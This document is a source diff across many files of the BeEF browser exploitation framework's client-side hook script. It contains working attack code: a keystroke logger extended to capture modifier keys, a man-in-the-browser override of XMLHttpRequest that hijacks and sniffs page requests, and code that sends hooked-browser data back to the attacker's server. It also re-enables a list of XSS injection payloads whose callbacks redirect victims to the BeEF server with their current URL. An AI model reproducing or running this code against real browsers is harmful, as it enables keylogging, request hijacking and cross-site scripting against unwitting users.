@@ -50,6 +51,7 @@ beef.logger = {
 	 */
 	start: function() {
 
+		beef.browser.hookChildFrames();
 		this.running = true;
 		var d = new Date();
 		this.time = d.getTime();
@@ -232,17 +234,28 @@ beef.logger = {
 	 */
 	parse_stream: function() {
 		var s = '';
-		for (var i in this.stream)
-		{
-			//s += (this.stream[i]['modifiers']['alt']) ? '*alt* ' : '';
-			//s += (this.stream[i]['modifiers']['ctrl']) ? '*ctrl* ' : '';
-			//s += (this.stream[i]['modifiers']['shift']) ? 'Shift+' : '';
-			s += String.fromCharCode(this.stream[i]['char']);
+        var mods = '';
+		for (var i in this.stream){
+         try{
+            var mod = this.stream[i]['modifiers'];
+            s += String.fromCharCode(this.stream[i]['char']);
+            if(typeof mod != 'undefined' &&
+                      (mod['alt'] == true ||
+                      mod['ctrl'] == true ||
+                      mod['shift'] == true)){
+                mods += (mod['alt']) ? ' [Alt] ' : '';
+                mods += (mod['ctrl']) ? ' [Ctrl] ' : '';
+                mods += (mod['shift']) ? ' [Shift] ' : '';
+                mods += String.fromCharCode(this.stream[i]['char']);
+            }
+
+         }catch(e){}
 		}
         var k = new beef.logger.e();
         k.type = 'keys';
         k.target = beef.logger.get_dom_identifier();
         k.data = s;
+        k.mods = mods;
         return k;
 	},
 	

core/main/client/mitb.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -14,47 +14,30 @@ beef.mitb = {
         beef.mitb.cid = cid;
         beef.mitb.curl = curl;
         /*Override open method to intercept ajax request*/
-        var xml_type;
+        var hook_file = "<%= @hook_file %>";
 
         if (window.XMLHttpRequest && !(window.ActiveXObject)) {
 
-            xml_type = 'XMLHttpRequest';
-        }
-
-        if (xml_type == "XMLHttpRequest") {
             beef.mitb.sniff("Method XMLHttpRequest.open override");
             (function (open) {
-                XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
-
-                    var portRegex = new RegExp(":[0-9]+");
-                    var portR = portRegex.exec(url);
-                    /*return :port*/
-                    var requestPort;
-
-                    if (portR != null) {
-                        requestPort = portR[0].split(":");
-                    }
-
-                    if ((user == "beef") && (pass == "beef")) {
-                        /*a poisoned something*/
-                        open.call(this, method, url, async, null, null);
-                    }
-
-
-                    else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
-                        /*a beef hook.js polling or dh */
-                        open.call(this, method, url, async, null, null);
-                    }
-
-                    else {
+                XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
+                    // Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
+                    // or a request initiated by the MiTB itself.
+                    if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
+                        open.call(this, method, url, async, true);
+                    }else {
+                        var portRegex = new RegExp(":[0-9]+");
+                        var portR = portRegex.exec(url);
+                        var requestPort;
+                        if (portR != null) { requestPort = portR[0].split(":")[1]; }
 
+                        //GET request
                         if (method == "GET") {
+                            //GET request -> cross-domain
                             if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
                                 beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
                                 window.open(url);
-
-                            }
-                            else {
+                            }else { //GET request -> same-domain
                                 beef.mitb.sniff("GET [Ajax Request]: " + url);
                                 if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
                                     var title = "";
@@ -63,26 +46,19 @@ beef.mitb = {
                                     } else {
                                         title = document.getElementsByTagName("title")[0].innerHTML;
                                     }
-                                    /*write the url of the page*/
+                                    // write the url of the page
                                     history.pushState({ Be:"EF" }, title, url);
-
                                 }
-
                             }
-
-                        }
-                        else {
-                            /*if we are here we have an ajax post req*/
-                            beef.mitb.sniff("Post ajax request to: " + url);
-                            open.call(this, method, url, async, user, pass);
-
+                        }else{
+                            //POST request
+                            beef.mitb.sniff("POST ajax request to: " + url);
+                            open.call(this, method, url, async, true);
                         }
                     }
                 };
             })(XMLHttpRequest.prototype.open);
-
         }
-
     },
 
     // Initializes the hook on anchors and forms.
@@ -161,7 +137,7 @@ beef.mitb = {
     fetchForm:function (url, query, target) {
         try {
             var y = new XMLHttpRequest();
-            y.open('POST', url, false, "beef", "beef");
+            y.open('POST', url, false, true);
             y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
@@ -181,14 +157,13 @@ beef.mitb = {
     fetch:function (url, target) {
         try {
             var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
-
                     target.innerHTML = y.responseText;
                     setTimeout(beef.mitb.hook, 10);
                 }
-            }
+            };
             y.send(null);
             beef.mitb.sniff("GET: " + url);
             return true;
@@ -204,7 +179,7 @@ beef.mitb = {
         try {
             var target = document.getElementsByTagName("html")[0];
             var y = new XMLHttpRequest();
-            y.open('GET', url, false, "beef", "beef");
+            y.open('GET', url, false, true);
             y.onreadystatechange = function () {
                 if (y.readyState == 4 && y.responseText != "") {
                     var title = "";
@@ -223,11 +198,9 @@ beef.mitb = {
             beef.mitb.sniff("GET: " + url);
 
         } catch (x) {
-
-
+            // the link is cross-domain, so load the resource in a different tab
             window.open(url);
             beef.mitb.sniff("GET [New Window]: " + url);
-
         }
     },
 

core/main/client/net.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -18,21 +18,21 @@
  */
 beef.net = {
 
-    host:"<%= @beef_host %>",
-    port:"<%= @beef_port %>",
-    hook:"<%= @beef_hook %>",
-    httpproto:"<%= @beef_proto %>",
-    handler:'/dh',
-    chop:500,
-    pad:30, //this is the amount of padding for extra params such as pc, pid and sid
-    sid_count:0,
-    cmd_queue:[],
+    host: "<%= @beef_host %>",
+    port: "<%= @beef_port %>",
+    hook: "<%= @beef_hook %>",
+    httpproto: "<%= @beef_proto %>",
+    handler: '/dh',
+    chop: 500,
+    pad: 30, //this is the amount of padding for extra params such as pc, pid and sid
+    sid_count: 0,
+    cmd_queue: [],
 
     /**
      * Command object. This represents the data to be sent back to BeEF,
      * using the beef.net.send() method.
      */
-    command:function () {
+    command: function () {
         this.cid = null;
         this.results = null;
         this.handler = null;
@@ -42,7 +42,7 @@ beef.net = {
     /**
      * Packet object. A single chunk of data. X packets -> 1 stream
      */
-    packet:function () {
+    packet: function () {
         this.id = null;
         this.data = null;
     },
@@ -50,7 +50,7 @@ beef.net = {
     /**
      * Stream object. Contains X packets, which are command result chunks.
      */
-    stream:function () {
+    stream: function () {
         this.id = null;
         this.packets = [];
         this.pc = 0;
@@ -58,8 +58,8 @@ beef.net = {
             return (this.url + this.handler + '?' + 'bh=' + beef.session.get_hook_session_id()).length;
         };
         this.get_packet_data = function () {
-             var p = this.packets.shift();
-             return {'bh':beef.session.get_hook_session_id(), 'sid':this.id, 'pid':p.id, 'pc':this.pc, 'd':p.data }
+            var p = this.packets.shift();
+            return {'bh': beef.session.get_hook_session_id(), 'sid': this.id, 'pid': p.id, 'pc': this.pc, 'd': p.data }
         };
     },
 
@@ -68,7 +68,7 @@ beef.net = {
      * NOTE: as we are using async mode, the response object will be empty if returned.
      * Using sync mode, request obj fields will be populated.
      */
-    response:function () {
+    response: function () {
         this.status_code = null;        // 500, 404, 200, 302
         this.status_text = null;        // success, timeout, error, ...
         this.response_body = null;      // "<html>…." if not a cross domain request
@@ -86,7 +86,7 @@ beef.net = {
      * @param: {String} results: the data to send
      * @param: {Function} callback: the function to call after execution
      */
-    queue:function (handler, cid, results, callback) {
+    queue: function (handler, cid, results, callback) {
         if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
             var s = new beef.net.command();
             s.cid = cid;
@@ -107,16 +107,16 @@ beef.net = {
      * @param: {String} results: the data to send
      * @param: {Function} callback: the function to call after execution
      */
-    send:function (handler, cid, results, callback) {
+    send: function (handler, cid, results, callback) {
         if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
             this.queue(handler, cid, results, callback);
             this.flush();
-        }else {
+        } else {
             try {
                 beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
                     '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
                     '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
-            }catch (e) {
+            } catch (e) {
                 this.queue(handler, cid, results, callback);
                 this.flush();
             }
@@ -131,7 +131,7 @@ beef.net = {
      * XHR-polling mechanism. If WebSockets are used, the data is sent
      * back to BeEF straight away.
      */
-    flush:function () {
+    flush: function () {
         if (this.cmd_queue.length > 0) {
             var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
             this.cmd_queue.length = 0;
@@ -159,7 +159,7 @@ beef.net = {
      * @param: {String} str: the input data
      * @param: {Integer} amount: chunk length
      */
-    chunk:function (str, amount) {
+    chunk: function (str, amount) {
         if (typeof amount == 'undefined') n = 2;
         return str.match(RegExp('.{1,' + amount + '}', 'g'));
     },
@@ -169,7 +169,7 @@ beef.net = {
      * It uses beef.net.request to send back the data.
      * @param: {Object} stream: the stream object to be sent back.
      */
-    push:function (stream) {
+    push: function (stream) {
         //need to implement wait feature here eventually
         for (var i = 0; i < stream.pc; i++) {
             this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
@@ -191,11 +191,11 @@ beef.net = {
      *
      * @return: {Object} response: this object contains the response details
      */
-    request:function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
+    request: function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
         //check if same domain or cross domain
         var cross_domain = true;
-		if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
-            if(document.location.port == "" || document.location.port == null){
+        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
+            if (document.location.port == "" || document.location.port == null) {
                 cross_domain = !(port == "80" || port == "443");
             }
         }
@@ -220,29 +220,29 @@ beef.net = {
          * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
          * This will turn POSTs into GETs for remote-domain requests.
          */
-        if (method == "POST"){
-           $j.ajaxSetup({
-              dataType: dataType
-           });
+        if (method == "POST") {
+            $j.ajaxSetup({
+                dataType: dataType
+            });
         } else {
-           $j.ajaxSetup({
+            $j.ajaxSetup({
                 dataType: 'script'
-           });
+            });
         }
 
         //build and execute the request
-        $j.ajax({type:method,
-            url:url,
-            data:data,
-            timeout:(timeout * 1000),
+        $j.ajax({type: method,
+            url: url,
+            data: data,
+            timeout: (timeout * 1000),
 
             //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
-            beforeSend:function (xhr) {
+            beforeSend: function (xhr) {
                 if (method == "POST") {
                     xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                 }
             },
-            success:function (data, textStatus, xhr) {
+            success: function (data, textStatus, xhr) {
                 var end_time = new Date().getTime();
                 response.status_code = xhr.status;
                 response.status_text = textStatus;
@@ -251,14 +251,14 @@ beef.net = {
                 response.was_timedout = false;
                 response.duration = (end_time - start_time);
             },
-            error:function (jqXHR, textStatus, errorThrown) {
+            error: function (jqXHR, textStatus, errorThrown) {
                 var end_time = new Date().getTime();
                 response.response_body = jqXHR.responseText;
                 response.status_code = jqXHR.status;
                 response.status_text = textStatus;
                 response.duration = (end_time - start_time);
             },
-            complete:function (jqXHR, textStatus) {
+            complete: function (jqXHR, textStatus) {
                 response.status_code = jqXHR.status;
                 response.status_text = textStatus;
                 response.headers = jqXHR.getAllResponseHeaders();
@@ -288,19 +288,20 @@ beef.net = {
      *
      * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
      */
-    forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
+    forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
 
         // check if same domain or cross domain
         var cross_domain = true;
-
-        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
-           if(document.location.port == "" || document.location.port == null){
-               cross_domain = !(port == "80" || port == "443");
-           } else {
-              if (document.location.port == port) cross_domain = false;
-           }
+        if (domain == "undefined" || path == "undefined") {
+            return;
+        }
+        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
+            if (document.location.port == "" || document.location.port == null) {
+                cross_domain = !(port == "80" || port == "443");
+            } else {
+                if (document.location.port == port) cross_domain = false;
+            }
         }
-
         // build the url
         var url = "";
         if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
@@ -333,7 +334,7 @@ beef.net = {
          * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
          * This will turn POSTs into GETs for remote-domain requests.
          */
-        if (method == "POST"){
+        if (method == "POST") {
             $j.ajaxSetup({
                 dataType: dataType
             });
@@ -343,8 +344,8 @@ beef.net = {
             });
         }
 
-		// this is required for bugs in IE so data can be transferred back to the server
-        if ( beef.browser.isIE() ) {
+        // this is required for bugs in IE so data can be transferred back to the server
+        if (beef.browser.isIE()) {
             dataType = 'script'
         }
 
@@ -355,14 +356,14 @@ beef.net = {
             timeout: (timeout * 1000),
 
             //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
-            beforeSend:function (xhr) {
+            beforeSend: function (xhr) {
                 if (method == "POST") {
                     xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                 }
             },
 
             // http server responded successfully
-            success:function (data, textStatus, xhr) {
+            success: function (data, textStatus, xhr) {
                 var end_time = new Date().getTime();
                 response.status_code = xhr.status;
                 response.status_text = textStatus;
@@ -373,7 +374,7 @@ beef.net = {
 
             // server responded with a http error (403, 404, 500, etc)
             // or server is not a http server
-            error:function (xhr, textStatus, errorThrown) {
+            error: function (xhr, textStatus, errorThrown) {
                 var end_time = new Date().getTime();
                 response.response_body = xhr.responseText;
                 response.status_code = xhr.status;
@@ -381,33 +382,33 @@ beef.net = {
                 response.duration = (end_time - start_time);
             },
 
-            complete:function (xhr, textStatus) {
+            complete: function (xhr, textStatus) {
                 // cross-domain request
                 if (cross_domain) {
 
-					response.port_status = "crossdomain";
+                    response.port_status = "crossdomain";
 
                     if (xhr.status != 0) {
-						response.status_code = xhr.status;
-					} else {
-						response.status_code = -1;
-					}
+                        response.status_code = xhr.status;
+                    } else {
+                        response.status_code = -1;
+                    }
 
-					if (textStatus) {
-                    	response.status_text = textStatus;
-					} else {
-						response.status_text = "crossdomain";
-					}
+                    if (textStatus) {
+                        response.status_text = textStatus;
+                    } else {
+                        response.status_text = "crossdomain";
+                    }
 
-					if (xhr.getAllResponseHeaders()) {
-	                    response.headers = xhr.getAllResponseHeaders();
-					} else {
-						response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
-					}
+                    if (xhr.getAllResponseHeaders()) {
+                        response.headers = xhr.getAllResponseHeaders();
+                    } else {
+                        response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+                    }
 
-					if (!response.response_body) {
-						response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
-					}
+                    if (!response.response_body) {
+                        response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+                    }
 
                 } else {
                     // same-domain request
@@ -420,8 +421,16 @@ beef.net = {
                         response.was_timedout = true;
                         response.response_body = "ERROR: Timed out\n";
                         response.port_status = "closed";
+                        /*
+                         * With IE we need to explicitly set the dataType to "script",
+                         * so there will be always parse-errors if the content is != javascript
+                         * */
                     } else if (textStatus == "parsererror") {
                         response.port_status = "not-http";
+                        if (beef.browser.isIE()) {
+                            response.status_text = "success";
+                            response.port_status = "open";
+                        }
                     } else {
                         response.port_status = "open";
                     }
@@ -434,7 +443,7 @@ beef.net = {
 
     //this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {}
     //http://andrewdupont.net/2006/05/18/javascript-associative-arrays-considered-harmful/
-    clean:function (r) {
+    clean: function (r) {
         if (this.array_has_string_key(r)) {
             var obj = {};
             for (var key in r)
@@ -445,7 +454,7 @@ beef.net = {
     },
 
     //Detects if an array has a string key
-    array_has_string_key:function (arr) {
+    array_has_string_key: function (arr) {
         if ($j.isArray(arr)) {
             try {
                 for (var key in arr)
@@ -459,7 +468,7 @@ beef.net = {
     /**
      * Sends back browser details to framework, calling beef.browser.getDetails()
      */
-    browser_details:function () {
+    browser_details: function () {
         var details = beef.browser.getDetails();
         details['HookSessionID'] = beef.session.get_hook_session_id();
         this.send('/init', 0, details);

core/main/client/net/dns.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -43,7 +43,7 @@ beef.net.dns = {
 
 		// sends a DNS request
 		sendQuery = function(query) {
-			//console.log("Requesting: "+query);
+			beef.debug("Requesting: "+query);
 			var img = new Image;
 			img.src = "http://"+query;
 			img.onload = function() { dom.removeChild(this); }

core/main/client/net/local.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net/portscanner.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net/requester.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -19,8 +19,7 @@ beef.net.requester = {
 	handler: "requester",
 	
 	send: function(requests_array) {
-
-        for (i in requests_array) {
+        for(var i=0; i<requests_array.length; i++){
             request = requests_array[i];
 
             beef.net.forge_request('http', request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
@@ -32,8 +31,6 @@ beef.net.requester = {
                                            response_headers: res.headers});
                                        }
                                  );
-
-
         }
     }
 };

core/main/client/net/xssrays.js

@@ -49,22 +49,20 @@ beef.net.xssrays = {
     //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
     vectors: [
 
-//				  {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
-//				  {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
-//				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
+				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
   				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
@@ -107,7 +105,7 @@ beef.net.xssrays = {
     // util function. Print string to the console only if the debug flag is on and the browser is not IE.
     printDebug:function(log) {
         if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
-            console.log("[XssRays] " + log);
+            beef.debug("[XssRays] " + log);
         }
     },
 
@@ -340,8 +338,8 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
-                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                        beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = vector.input.replace(/XSS/g, beefCallback);
 
@@ -368,7 +366,7 @@ beef.net.xssrays = {
                 beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                 beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                    + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                    + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                 exploit = vector.input.replace(/XSS/g, beefCallback);
 
@@ -424,7 +422,7 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                         beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
                         form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';

core/main/client/os.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -7,9 +7,9 @@
 beef.os = {
 
 	ua: navigator.userAgent,
-	
+
 	isWin311: function() {
-		return (this.ua.indexOf("Win16") != -1) ? true : false;
+		return (this.ua.match('(Win16)')) ? true : false;
 	},
 	
 	isWinNT4: function() {
@@ -19,18 +19,25 @@ beef.os = {
 	isWin95: function() {
 		return (this.ua.match('(Windows 95)|(Win95)|(Windows_95)')) ? true : false;
 	},
+	isWinCE: function() {
+		return (this.ua.match('(Windows CE)')) ? true : false;
+	},
 	
 	isWin98: function() {
 		return (this.ua.match('(Windows 98)|(Win98)')) ? true : false;
 	},
 	
 	isWinME: function() {
-		return (this.ua.indexOf('Windows ME') != -1) ? true : false;
+		return (this.ua.match('(Windows ME)|(Win 9x 4.90)')) ? true : false;
 	},
 	
 	isWin2000: function() {
 		return (this.ua.match('(Windows NT 5.0)|(Windows 2000)')) ? true : false;
 	},
+
+	isWin2000SP1: function() {
+		return (this.ua.match('Windows NT 5.01 ')) ? true : false;
+	},
 	
 	isWinXP: function() {
 		return (this.ua.match('(Windows NT 5.1)|(Windows XP)')) ? true : false;
@@ -47,6 +54,10 @@ beef.os = {
 	isWin7: function() {
 		return (this.ua.match('(Windows NT 6.1)|(Windows NT 7.0)')) ? true : false;
 	},
+
+	isWin8: function() {
+		return (this.ua.match('(Windows NT 6.2)')) ? true : false;
+	},
 	
 	isOpenBSD: function() {
 		return (this.ua.indexOf('OpenBSD') != -1) ? true : false;
@@ -103,19 +114,26 @@ beef.os = {
 	isBeOS: function() {
 		return (this.ua.match('BeOS')) ? true : false;
 	},
+
+	isWindows: function() {
+		return this.isWin311() || this.isWinNT4() || this.isWinCE() || this.isWin95() || this.isWin98() || this.isWinME() || this.isWin2000() || this.isWin2000SP1() || this.isWinXP() || this.isWinServer2003() || this.isWinVista() || this.isWin7() || this.isWin8() || this.isWinPhone();
+	},
 	
 	getName: function() {
-		//windows
-		if(this.isWin311()) return 'Windows 3.11';
-		if(this.isWinNT4()) return 'Windows NT 4';
-		if(this.isWin95()) return 'Windows 95';
-		if(this.isWin98()) return 'Windows 98';
-		if(this.isWinME()) return 'Windows Millenium';
-		if(this.isWin2000()) return 'Windows 2000';
-		if(this.isWinXP()) return 'Windows XP';
+		//Windows
+		if(this.isWin311())        return 'Windows 3.11';
+		if(this.isWinNT4())        return 'Windows NT 4';
+		if(this.isWinCE())         return 'Windows CE';
+		if(this.isWin95())         return 'Windows 95';
+		if(this.isWin98())         return 'Windows 98';
+		if(this.isWinME())         return 'Windows Millenium';
+		if(this.isWin2000())       return 'Windows 2000';
+		if(this.isWin2000SP1())    return 'Windows 2000 SP1';
+		if(this.isWinXP())         return 'Windows XP';
 		if(this.isWinServer2003()) return 'Windows Server 2003';
-		if(this.isWinVista()) return 'Windows Vista';
-		if(this.isWin7()) return 'Windows 7';
+		if(this.isWinVista())      return 'Windows Vista';
+		if(this.isWin7())          return 'Windows 7';
+		if(this.isWin8())          return 'Windows 8';
 
 		//Nokia
 		if(this.isNokia()) {

core/main/client/session.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
